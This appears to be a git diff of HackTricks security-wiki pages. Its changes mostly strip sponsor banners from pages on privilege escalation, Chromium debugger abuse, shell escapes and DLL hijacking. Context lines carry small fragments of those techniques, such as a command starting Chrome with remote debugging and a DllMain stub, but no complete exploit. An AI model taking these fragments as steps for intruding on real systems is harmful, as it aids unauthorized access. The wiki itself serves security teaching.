- -Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! - -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking - -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights - -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates - -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! - {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/linux-hardening/privilege-escalation/cisco-vmanage.md b/src/linux-hardening/privilege-escalation/cisco-vmanage.md index d140dcd5a..6276e600b 100644 --- a/src/linux-hardening/privilege-escalation/cisco-vmanage.md +++ b/src/linux-hardening/privilege-escalation/cisco-vmanage.md @@ -159,3 +159,5 @@ bash-4.4# ``` {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md b/src/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md index 74f452daf..b3dac3ed6 100644 --- a/src/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md +++ b/src/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md @@ -50,3 +50,5 @@ docker-security/ {{#endref}} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md b/src/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md index 5cf9f9815..b9a22e24a 100644 --- a/src/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md +++ b/src/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md @@ -469,3 +469,5 @@ finish: - [https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/](https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md b/src/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md index 1aa065326..7c7d2b99b 100644 --- a/src/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md +++ b/src/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md @@ -166,3 +166,5 @@ Start-Process "Chrome" "--remote-debugging-port=9222 --restore-last-session" - [https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/](https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/linux-hardening/privilege-escalation/escaping-from-limited-bash.md b/src/linux-hardening/privilege-escalation/escaping-from-limited-bash.md index d2db5d66c..66d716c59 100644 --- a/src/linux-hardening/privilege-escalation/escaping-from-limited-bash.md +++ b/src/linux-hardening/privilege-escalation/escaping-from-limited-bash.md @@ -290,3 +290,5 @@ debug.debug() - [https://www.youtube.com/watch?v=UO618TeyCWo](https://www.youtube.com/watch?v=UO618TeyCWo) (Slides: [https://deepsec.net/docs/Slides/2015/Chw00t_How_To_Break%20Out_from_Various_Chroot_Solutions\_-_Bucsay_Balazs.pdf](https://deepsec.net/docs/Slides/2015/Chw00t_How_To_Break%20Out_from_Various_Chroot_Solutions_-_Bucsay_Balazs.pdf)) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/linux-hardening/privilege-escalation/euid-ruid-suid.md b/src/linux-hardening/privilege-escalation/euid-ruid-suid.md index f9846b44b..b1a0ffc3a 100644 --- a/src/linux-hardening/privilege-escalation/euid-ruid-suid.md +++ b/src/linux-hardening/privilege-escalation/euid-ruid-suid.md @@ -2,11 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} ### User Identification Variables @@ -215,10 +210,7 @@ uid=99(nobody) gid=99(nobody) euid=100 - [https://0xdf.gitlab.io/2022/05/31/setuid-rabbithole.html#testing-on-jail](https://0xdf.gitlab.io/2022/05/31/setuid-rabbithole.html#testing-on-jail) -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/linux-hardening/useful-linux-commands.md b/src/linux-hardening/useful-linux-commands.md index 2ee9f1b39..eecf79889 100644 --- a/src/linux-hardening/useful-linux-commands.md +++ b/src/linux-hardening/useful-linux-commands.md @@ -1,13 +1,5 @@ # Useful Linux Commands -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - {{#include ../banners/hacktricks-training.md}} ## Common Bash @@ -131,14 +123,6 @@ sudo chattr -i file.txt #Remove the bit so you can delete it 7z l file.zip ``` -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - ## Bash for Windows ```bash @@ -325,10 +309,3 @@ iptables -P OUTPUT ACCEPT {{#include ../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} diff --git a/src/online-platforms-with-api.md b/src/online-platforms-with-api.md index 51e09bc72..09fb5715e 100644 --- a/src/online-platforms-with-api.md +++ b/src/online-platforms-with-api.md @@ -120,3 +120,4 @@ Search by domain and email and get if it was pwned and passwords. Commercial? {{#include ./banners/hacktricks-training.md}} + diff --git a/src/other-web-tricks.md b/src/other-web-tricks.md index f442a4533..a17d557c7 100644 --- a/src/other-web-tricks.md +++ b/src/other-web-tricks.md @@ -2,13 +2,6 @@ {{#include ./banners/hacktricks-training.md}} -
- -**Get a hacker's perspective on your web apps, network, and cloud** - -**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports. - -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} ### Host header @@ -41,12 +34,7 @@ Developers might forget to disable various debugging options in the production e ![Image for post](https://miro.medium.com/max/1330/1*wDFRADTOd9Tj63xucenvAA.png) -
- -**Get a hacker's perspective on your web apps, network, and cloud** - -**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports. - -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {{#include ./banners/hacktricks-training.md}} + + diff --git a/src/pentesting-dns.md b/src/pentesting-dns.md index 8bd354c0a..ac44c461a 100644 --- a/src/pentesting-dns.md +++ b/src/pentesting-dns.md @@ -7,3 +7,5 @@ **DNS in IPv6** {{#include ./banners/hacktricks-training.md}} + + diff --git a/src/post-exploitation.md b/src/post-exploitation.md index 531f82530..71e3947dd 100644 --- a/src/post-exploitation.md +++ b/src/post-exploitation.md @@ -14,3 +14,5 @@ - [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound is a command line tool for red and blue teams to quickly perform reconnaissance of a Slack workspace/organization. Slackhound makes collection of an organization's users, files, messages, etc. quickly searchable and large objects are written to CSV for offline review. {{#include ./banners/hacktricks-training.md}} + + diff --git a/src/stealing-sensitive-information-disclosure-from-a-web.md b/src/stealing-sensitive-information-disclosure-from-a-web.md index c24ee8094..157e415b1 100644 --- a/src/stealing-sensitive-information-disclosure-from-a-web.md +++ b/src/stealing-sensitive-information-disclosure-from-a-web.md @@ -11,3 +11,5 @@ Here I present you the main ways to can try to achieve it: - [**Clickjaking**](pentesting-web/clickjacking.md): If there is no protection against this attack, you may be able to trick the user into sending you the sensitive data (an example [here](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)). {{#include ./banners/hacktricks-training.md}} + + diff --git a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md index b0dbd83ea..5b13574b1 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md +++ b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md @@ -2,11 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! - -{% embed url="https://go.intigriti.com/hacktricks" %} ## Basic Information @@ -238,11 +233,6 @@ BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReser - [https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e](https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e) - [https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html](https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html) -
- -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! - -{% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../../../banners/hacktricks-training.md}}